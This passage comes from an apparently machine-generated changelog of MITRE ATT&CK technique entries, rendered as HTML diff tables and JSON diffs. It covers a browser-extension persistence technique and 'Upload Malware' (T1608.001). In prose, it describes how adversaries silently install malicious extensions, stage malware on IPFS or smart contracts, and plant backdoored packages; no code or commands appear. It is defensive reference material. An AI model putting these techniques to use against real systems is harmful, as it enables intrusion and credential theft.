nowrap=\"nowrap\">nd/or&nbsp;Secure&nbsp;Preferences&nbsp;files&nbsp;to&nbsp;silently&nbsp;install&nbsp;malicious</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;extensions.&nbsp;When&nbsp;the&nbsp;browser&nbsp;is&nbsp;not&nbsp;running,&nbsp;adversaries&nbsp;ca</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;extensions.&nbsp;When&nbsp;the&nbsp;browser&nbsp;is&nbsp;not&nbsp;running,&nbsp;adversaries&nbsp;ca</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">n&nbsp;alter&nbsp;these&nbsp;files,&nbsp;ensuring&nbsp;the&nbsp;extension&nbsp;is&nbsp;loaded,&nbsp;grant</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">n&nbsp;alter&nbsp;these&nbsp;files,&nbsp;ensuring&nbsp;the&nbsp;extension&nbsp;is&nbsp;loaded,&nbsp;grant</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ed&nbsp;desired&nbsp;permissions,&nbsp;and&nbsp;will&nbsp;persist&nbsp;in&nbsp;browser&nbsp;sessions</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ed&nbsp;desired&nbsp;permissions,&nbsp;and&nbsp;will&nbsp;persist&nbsp;in&nbsp;browser&nbsp;sessions</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">.&nbsp;This&nbsp;method&nbsp;does&nbsp;not&nbsp;require&nbsp;user&nbsp;consent&nbsp;and&nbsp;extensions&nbsp;a</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">.&nbsp;This&nbsp;method&nbsp;does&nbsp;not&nbsp;require&nbsp;user&nbsp;consent&nbsp;and&nbsp;extensions&nbsp;a</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">re&nbsp;silently&nbsp;loaded&nbsp;in&nbsp;the&nbsp;background&nbsp;from&nbsp;disk&nbsp;or&nbsp;from&nbsp;the&nbsp;b</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">re&nbsp;silently&nbsp;loaded&nbsp;in&nbsp;the&nbsp;background&nbsp;from&nbsp;disk&nbsp;or&nbsp;from&nbsp;the&nbsp;b</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">rowser's&nbsp;trusted&nbsp;store.(Citation:&nbsp;Pulsedive)&nbsp;&nbsp;&nbsp;&nbsp;Previous&nbsp;to&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">rowser's&nbsp;trusted&nbsp;store.(Citation:&nbsp;Pulsedive)&nbsp;&nbsp;&nbsp;&nbsp;Previous&nbsp;to&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">macOS&nbsp;11,&nbsp;adversaries&nbsp;could&nbsp;silently&nbsp;install&nbsp;browser&nbsp;extensi</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">macOS&nbsp;11,&nbsp;adversaries&nbsp;could&nbsp;silently&nbsp;install&nbsp;browser&nbsp;extensi</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ons&nbsp;via&nbsp;the&nbsp;command&nbsp;line&nbsp;using&nbsp;the&nbsp;&lt;code&gt;profiles&lt;/code&gt;&nbsp;too</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ons&nbsp;via&nbsp;the&nbsp;command&nbsp;line&nbsp;using&nbsp;the&nbsp;&lt;code&gt;profiles&lt;/code&gt;&nbsp;too</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">l&nbsp;to&nbsp;install&nbsp;malicious&nbsp;&lt;code&gt;.mobileconfig&lt;/code&gt;&nbsp;files.&nbsp;In&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">l&nbsp;to&nbsp;install&nbsp;malicious&nbsp;&lt;code&gt;.mobileconfig&lt;/code&gt;&nbsp;files.&nbsp;In&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">macOS&nbsp;11+,&nbsp;the&nbsp;use&nbsp;of&nbsp;the&nbsp;&lt;code&gt;profiles&lt;/code&gt;&nbsp;tool&nbsp;can&nbsp;no&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">macOS&nbsp;11+,&nbsp;the&nbsp;use&nbsp;of&nbsp;the&nbsp;&lt;code&gt;profiles&lt;/code&gt;&nbsp;tool&nbsp;can&nbsp;no&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">longer&nbsp;install&nbsp;configuration&nbsp;profiles;&nbsp;however,&nbsp;&lt;code&gt;.mobil</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">longer&nbsp;install&nbsp;configuration&nbsp;profiles;&nbsp;however,&nbsp;&lt;code&gt;.mobil</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">econfig&lt;/code&gt;&nbsp;files&nbsp;can&nbsp;be&nbsp;planted&nbsp;and&nbsp;installed&nbsp;with&nbsp;user&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">econfig&lt;/code&gt;&nbsp;files&nbsp;can&nbsp;be&nbsp;planted&nbsp;and&nbsp;installed&nbsp;with&nbsp;user&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">interaction.(Citation:&nbsp;xorrior&nbsp;chrome&nbsp;extensions&nbsp;macOS)&nbsp;&nbsp;&nbsp;&nbsp;O</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">interaction.(Citation:&nbsp;xorrior&nbsp;chrome&nbsp;extensions&nbsp;macOS)&nbsp;&nbsp;&nbsp;&nbsp;O</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">nce&nbsp;the&nbsp;extension&nbsp;is&nbsp;installed,&nbsp;it&nbsp;can&nbsp;browse&nbsp;to&nbsp;websites&nbsp;in</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">nce&nbsp;the&nbsp;extension&nbsp;is&nbsp;installed,&nbsp;it&nbsp;can&nbsp;browse&nbsp;to&nbsp;websites&nbsp;in</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;the&nbsp;background,&nbsp;steal&nbsp;all&nbsp;information&nbsp;that&nbsp;a&nbsp;user&nbsp;enters&nbsp;in</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;the&nbsp;background,&nbsp;steal&nbsp;all&nbsp;information&nbsp;that&nbsp;a&nbsp;user&nbsp;enters&nbsp;in</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">to&nbsp;a&nbsp;browser&nbsp;(including&nbsp;credentials),&nbsp;and&nbsp;be&nbsp;used&nbsp;as&nbsp;an&nbsp;inst</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">to&nbsp;a&nbsp;browser&nbsp;(including&nbsp;credentials),&nbsp;and&nbsp;be&nbsp;used&nbsp;as&nbsp;an&nbsp;inst</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">aller&nbsp;for&nbsp;a&nbsp;RAT&nbsp;for&nbsp;persistence.(Citation:&nbsp;Chrome&nbsp;Extension&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">aller&nbsp;for&nbsp;a&nbsp;RAT&nbsp;for&nbsp;persistence.(Citation:&nbsp;Chrome&nbsp;Extension&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">Crypto&nbsp;Miner)(Citation:&nbsp;ICEBRG&nbsp;Chrome&nbsp;Extensions)(Citation:&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">Crypto&nbsp;Miner)(Citation:&nbsp;ICEBRG&nbsp;Chrome&nbsp;Extensions)(Citation:&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">Banker&nbsp;Google&nbsp;Chrome&nbsp;Extension&nbsp;Steals&nbsp;Creds)(Citation:&nbsp;Catch</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">Banker&nbsp;Google&nbsp;Chrome&nbsp;Extension&nbsp;Steals&nbsp;Creds)(Citation:&nbsp;Catch</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;All&nbsp;Chrome&nbsp;Extension)&nbsp;&nbsp;&nbsp;There&nbsp;have&nbsp;also&nbsp;been&nbsp;instances&nbsp;of&nbsp;b</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;All&nbsp;Chrome&nbsp;Extension)&nbsp;&nbsp;&nbsp;There&nbsp;have&nbsp;also&nbsp;been&nbsp;instances&nbsp;of&nbsp;b</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">otnets&nbsp;using&nbsp;a&nbsp;persistent&nbsp;backdoor&nbsp;through&nbsp;malicious&nbsp;Chrome&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">otnets&nbsp;using&nbsp;a&nbsp;persistent&nbsp;backdoor&nbsp;through&nbsp;malicious&nbsp;Chrome&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">extensions&nbsp;for&nbsp;[Command&nbsp;and&nbsp;Control](https://attack.mitre.or</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">extensions&nbsp;for&nbsp;[Command&nbsp;and&nbsp;Control](https://attack.mitre.or</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">g/tactics/TA0011).(Citation:&nbsp;Stantinko&nbsp;Botnet)(Citation:&nbsp;Chr</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">g/tactics/TA0011).(Citation:&nbsp;Stantinko&nbsp;Botnet)(Citation:&nbsp;Chr</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ome&nbsp;Extension&nbsp;C2&nbsp;Malware)&nbsp;Adversaries&nbsp;may&nbsp;also&nbsp;use&nbsp;browser&nbsp;e</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ome&nbsp;Extension&nbsp;C2&nbsp;Malware)&nbsp;Adversaries&nbsp;may&nbsp;also&nbsp;use&nbsp;browser&nbsp;e</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">xtensions&nbsp;to&nbsp;modify&nbsp;browser&nbsp;permissions&nbsp;and&nbsp;components,&nbsp;priv</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">xtensions&nbsp;to&nbsp;modify&nbsp;browser&nbsp;permissions&nbsp;and&nbsp;components,&nbsp;priv</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">acy&nbsp;settings,&nbsp;and&nbsp;other&nbsp;security&nbsp;controls&nbsp;for&nbsp;[<span class=\"diff_chg\">Defense&nbsp;Evasi</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">acy&nbsp;settings,&nbsp;and&nbsp;other&nbsp;security&nbsp;controls&nbsp;for&nbsp;[<span class=\"diff_chg\">Stealth</span>](http</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_chg\">on</span>](https://attack.mitre.org/tactics/TA0005).(Citation:&nbsp;Brow</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">s://attack.mitre.org/tactics/TA0005).(Citation:&nbsp;Browers&nbsp;Fria</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ers&nbsp;FriarFox)(Citation:&nbsp;Browser&nbsp;Adrozek)&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">rFox)(Citation:&nbsp;Browser&nbsp;Adrozek)&nbsp;</td></tr>\n        </tbody>\n    </table>",
                    "changelog_mitigations": {
                        "shared": [
                            "M1017: User Training",
                            "M1033: Limit Software Installation",
                            "M1038: Execution Prevention",
                            "M1047: Audit",
                            "M1051: Update Software"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0044: Detecting Malicious Browser Extensions Across Platforms"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--3ee16395-03f0-4690-a32e-69ce9ada0f9e",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-03-17 20:09:13.222000+00:00",
                    "modified": "2026-04-01 19:06:26.976000+00:00",
                    "name": "Upload Malware",
                    "description": "Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, and a variety of other malicious content. Adversaries may upload malware to support their operations, such as making a payload available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server.\n\nMalware may be placed on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). Malware can also be staged on web services, such as GitHub or Pastebin; hosted on the InterPlanetary File System (IPFS), where decentralized content storage makes the removal of malicious files difficult; or saved on the blockchain as smart contracts, which are resilient against takedowns that would affect traditional infrastructure.(Citation: Volexity Ocean Lotus November 2020)(Citation: Talos IPFS 2022)(Citation: Guardio Etherhiding 2023)(Citation: Bleeping Computer Binance Smart Chain 2023)\n\nAdversaries may upload backdoored files, such as software packages, application binaries, virtual machine images, or container images, to third-party software stores, package libraries, extension marketplaces, or repositories (ex: GitHub, CNET, AWS Community AMIs, Docker Hub, PyPi, NPM).(Citation: Datadog Security Labs Malicious PyPi Packages 2024) By chance encounter, victims may directly download/install these backdoored files via [User Execution](https://attack.mitre.org/techniques/T1204). Masquerading, including typosquatting legitimate software, may increase the chance of users mistakenly executing these files. ",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "resource-development"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1608/001",
                            "external_id": "T1608.001"
                        },
                        {
                            "source_name": "Datadog Security Labs Malicious PyPi Packages 2024",
                            "description": " Sebastian Obregoso  and Christophe Tafani-Dereeper. (2024, May 23). Malicious PyPI packages targeting highly specific MacOS machines. Retrieved May 22, 2025.",
                            "url": "https://securitylabs.datadoghq.com/articles/malicious-pypi-package-targeting-highly-specific-macos-machines/"
                        },
                        {
                            "source_name": "Volexity Ocean Lotus November 2020",
                            "description": "Adair, S. and Lancaster, T. (2020, November 6). OceanLotus: Extending Cyber Espionage Operations Through Fake Websites. Retrieved November 20, 2020.",
                            "url": "https://www.volexity.com/blog/2020/11/06/oceanlotus-extending-cyber-espionage-operations-through-fake-websites/"
                        },
                        {
                            "source_name": "Bleeping Computer Binance Smart Chain 2023",
                            "description": "Bill Toulas. (2023, October 13). Hackers use Binance Smart Chain contracts to store malicious scripts. Retrieved May 22, 2025.",
                            "url": "https://www.bleepingcomputer.com/news/security/hackers-use-binance-smart-chain-contracts-to-store-malicious-scripts/"
                        },
                        {
                            "source_name": "Talos IPFS 2022",
                            "description": "Edmund Brumaghin. (2022, November 9). Threat Spotlight: Cyber Criminal Adoption of IPFS for Phishing, Malware Campaigns. Retrieved March 8, 2023.",
                            "url": "https://blog.talosintelligence.com/ipfs-abuse/"
                        },
                        {
                            "source_name": "Guardio Etherhiding 2023",
                            "description": "Nati Tal and Oleg Zaytsev. (2023, October 13). \u201cEtherHiding\u201d \u2014 Hiding Web2 Malicious Code in Web3 Smart Contracts. Retrieved May 22, 2025.",
                            "url": "https://labs.guard.io/etherhiding-hiding-web2-malicious-code-in-web3-smart-contracts-65ea78efad16"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Kobi Haimovich, CardinalOps",
                        "Menachem Goldstein",
                        "Adam Hunt",
                        "Ray Jasinski"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "PRE"
                    ],
                    "x_mitre_version": "1.3",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-01 19:06:26.976000+00:00\", \"old_value\": \"2025-10-24 17:48:41.583000+00:00\"}, \"root['description']\": {\"new_value\": \"Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, and a variety of other malicious content. Adversaries may upload malware to support their operations, such as making a payload available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server.\\n\\nMalware may be placed on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). Malware can also be staged on web services, such as GitHub or Pastebin; hosted on the InterPlanetary File System (IPFS), where decentralized content storage makes the removal of malicious files difficult; or saved on the blockchain as smart contracts, which are resilient against takedowns that would affect traditional infrastructure.(Citation: Volexity Ocean Lotus November 2020)(Citation: Talos IPFS 2022)(Citation: Guardio Etherhiding 2023)(Citation: Bleeping Computer Binance Smart Chain 2023)\\n\\nAdversaries may upload backdoored files, such as software packages, application binaries, virtual machine images, or container images, to third-party software stores, package libraries, extension marketplaces, or repositories (ex: GitHub, CNET, AWS Community AMIs, Docker Hub, PyPi, NPM).(Citation: Datadog Security Labs Malicious PyPi Packages 2024) By chance encounter, victims may directly download/install these backdoored files via [User Execution](https://attack.mitre.org/techniques/T1204). Masquerading, including typosquatting legitimate software, may increase the chance of users mistakenly executing these files. \", \"old_value\": \"Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, and a variety of other malicious content. Adversaries may upload malware to support their operations, such as making a payload available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server.\\n\\nMalware may be placed on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). Malware can also be staged on web services, such as GitHub or Pastebin; hosted on the InterPlanetary File System (IPFS), where decentralized content storage makes the removal of malicious files difficult; or saved on the blockchain as smart contracts, which are resilient against takedowns that would affect traditional infrastructure.(Citation: Volexity Ocean Lotus November 2020)(Citation: Talos IPFS 2022)(Citation: Guardio Etherhiding 2023)(Citation: Bleeping Computer Binance Smart Chain 2023)\\n\\nAdversaries may upload backdoored files, such as software packages, application binaries, virtual machine images, or container images, to third-party software stores, package libraries, extension marketplaces, or repositories (ex: GitHub, CNET, AWS Community AMIs, Docker Hub, PyPi, NPM).(Citation: Datadog Security Labs Malicious PyPi Packages 2024) By chance encounter, victims may directly download/install these backdoored files via [User Execution](https://attack.mitre.org/techniques/T1204). Masquerading, including typo-squatting legitimate software, may increase the chance of users mistakenly executing these files. \", \"diff\": \"--- \\n+++ \\n@@ -2,4 +2,4 @@\\n \\n Malware may be placed on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). Malware can also be staged on web services, such as GitHub or Pastebin; hosted on the InterPlanetary File System (IPFS), where decentralized content storage makes the removal of malicious files difficult; or saved on the blockchain as smart contracts, which are resilient against takedowns that would affect traditional infrastructure.(Citation: Volexity Ocean Lotus November 2020)(Citation: Talos IPFS 2022)(Citation: Guardio Etherhiding 2023)(Citation: Bleeping Computer Binance Smart Chain 2023)\\n \\n-Adversaries may upload backdoored files, such as software packages, application binaries, virtual machine images, or container images, to third-party software stores, package libraries, extension marketplaces, or repositories (ex: GitHub, CNET, AWS Community AMIs, Docker Hub, PyPi, NPM).(Citation: Datadog Security Labs Malicious PyPi Packages 2024) By chance encounter, victims may directly download/install these backdoored files via [User Execution](https://attack.mitre.org/techniques/T1204). Masquerading, including typo-squatting legitimate software, may increase the chance of users mistakenly executing these files. \\n+Adversaries may upload backdoored files, such as software packages, application binaries, virtual machine images, or container images, to third-party software stores, package libraries, extension marketplaces, or repositories (ex: GitHub, CNET, AWS Community AMIs, Docker Hub, PyPi, NPM).(Citation: Datadog Security Labs Malicious PyPi Packages 2024) By chance encounter, victims may directly download/install these backdoored files via [User Execution](https://attack.mitre.org/techniques/T1204). Masquerading, including typosquatting legitimate software, may increase the chance of users mistakenly executing these files. \"}}}",
                    "previous_version": "1.3",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to27__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to27__0\"><a href=\"#difflib_chg_to27__top\">t</a></td><td class=\"diff_header\" id=\"from27_1\">1</td><td nowrap=\"nowrap\">Adversaries&nbsp;may&nbsp;upload&nbsp;malware&nbsp;to&nbsp;third-party&nbsp;or&nbsp;adversary&nbsp;c</td><td class=\"diff_next\"><a href=\"#difflib_chg_to27__top\">t</a></td><td class=\"diff_header\" id=\"to27_1\">1</td><td nowrap=\"nowrap\">Adversaries&nbsp;may&nbsp;upload&nbsp;malware&nbsp;to&nbsp;third-party&nbsp;or&nbsp;adversary&nbsp;c</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ontrolled&nbsp;infrastructure&nbsp;to&nbsp;make&nbsp;it&nbsp;accessible&nbsp;during&nbsp;target</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ontrolled&nbsp;infrastructure&nbsp;to&nbsp;make&nbsp;it&nbsp;accessible&nbsp;during&nbsp;target</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ing.&nbsp;Malicious&nbsp;software&nbsp;can&nbsp;include&nbsp;payloads,&nbsp;droppers,&nbsp;post</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ing.&nbsp;Malicious&nbsp;software&nbsp;can&nbsp;include&nbsp;payloads,&nbsp;droppers,&nbsp;post</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">-compromise&nbsp;tools,&nbsp;backdoors,&nbsp;and&nbsp;a&nbsp;variety&nbsp;of&nbsp;other&nbsp;malicio</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">-compromise&nbsp;tools,&nbsp;backdoors,&nbsp;and&nbsp;a&nbsp;variety&nbsp;of&nbsp;other&nbsp;malicio</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">us&nbsp;content.&nbsp;Adversaries&nbsp;may&nbsp;upload&nbsp;malware&nbsp;to&nbsp;support&nbsp;their&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">us&nbsp;content.&nbsp;Adversaries&nbsp;may&nbsp;upload&nbsp;malware&nbsp;to&nbsp;support&nbsp;their&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">operations,&nbsp;such&nbsp;as&nbsp;making&nbsp;a&nbsp;payload&nbsp;available&nbsp;to&nbsp;a&nbsp;victim&nbsp;n</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">operations,&nbsp;such&nbsp;as&nbsp;making&nbsp;a&nbsp;payload&nbsp;available&nbsp;to&nbsp;a&nbsp;victim&nbsp;n</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">etwork&nbsp;to&nbsp;enable&nbsp;[Ingress&nbsp;Tool&nbsp;Transfer](https://attack.mitr</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">etwork&nbsp;to&nbsp;enable&nbsp;[Ingress&nbsp;Tool&nbsp;Transfer](https://attack.mitr</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">e.org/techniques/T1105)&nbsp;by&nbsp;placing&nbsp;it&nbsp;on&nbsp;an&nbsp;Internet&nbsp;accessi</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">e.org/techniques/T1105)&nbsp;by&nbsp;placing&nbsp;it&nbsp;on&nbsp;an&nbsp;Internet&nbsp;accessi</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ble&nbsp;web&nbsp;server.&nbsp;&nbsp;Malware&nbsp;may&nbsp;be&nbsp;placed&nbsp;on&nbsp;infrastructure&nbsp;tha</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ble&nbsp;web&nbsp;server.&nbsp;&nbsp;Malware&nbsp;may&nbsp;be&nbsp;placed&nbsp;on&nbsp;infrastructure&nbsp;tha</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">t&nbsp;was&nbsp;previously&nbsp;purchased/rented&nbsp;by&nbsp;the&nbsp;adversary&nbsp;([Acquire</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">t&nbsp;was&nbsp;previously&nbsp;purchased/rented&nbsp;by&nbsp;the&nbsp;adversary&nbsp;([Acquire</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;Infrastructure](https://attack.mitre.org/techniques/T1583))</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;Infrastructure](https://attack.mitre.org/techniques/T1583))</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;or&nbsp;was&nbsp;otherwise&nbsp;compromised&nbsp;by&nbsp;them&nbsp;([Compromise&nbsp;Infrastru</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;or&nbsp;was&nbsp;otherwise&nbsp;compromised&nbsp;by&nbsp;them&nbsp;([Compromise&nbsp;Infrastru</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">cture](https://attack.mitre.org/techniques/T1584)).&nbsp;Malware&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">cture](https://attack.mitre.org/techniques/T1584)).&nbsp;Malware&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">can&nbsp;also&nbsp;be&nbsp;staged&nbsp;on&nbsp;web&nbsp;services,&nbsp;such&nbsp;as&nbsp;GitHub&nbsp;or&nbsp;Pasteb</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td 